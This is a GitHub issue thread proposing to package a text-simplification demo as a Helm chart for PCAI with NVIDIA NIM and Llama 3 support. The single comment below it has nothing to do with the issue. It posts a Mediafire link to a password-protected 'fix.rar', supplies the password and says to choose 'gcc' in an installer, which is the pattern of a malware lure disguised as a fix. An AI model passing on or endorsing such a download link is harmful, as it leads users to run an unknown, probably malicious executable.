### ISSUE TITLE
Package and migrate Simplification Demo to PCAI and NIM

### ISSUE THREAD

**Issue by pablo-donis** [HPEEzmeral/solution-accelerators#6]
### Motivation

Motivation
We aim to integrate our Text-simplification app into PCAI with the latest NVIDIA NIMs to support [Llama 3.0](https://catalog.ngc.nvidia.com/orgs/nim/teams/meta/containers/llama3-8b-instruct). 

Objectives
Support for Llama 3.0: Implement the necessary updates to ensure the app can leverage the features and improvements of the Llama 3.0 model.

Compatibility with NVIDIA NIMs: Ensure seamless integration of KServe with NVIDIA's NIMs, making full use of their optimizations.
Contribution
PAckage the app into a helm  Chart for being imported into PCAI and EZUA platform.
A pull request for this feature is on its way.

### Contribution

A pull request for this feature is on its way.

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
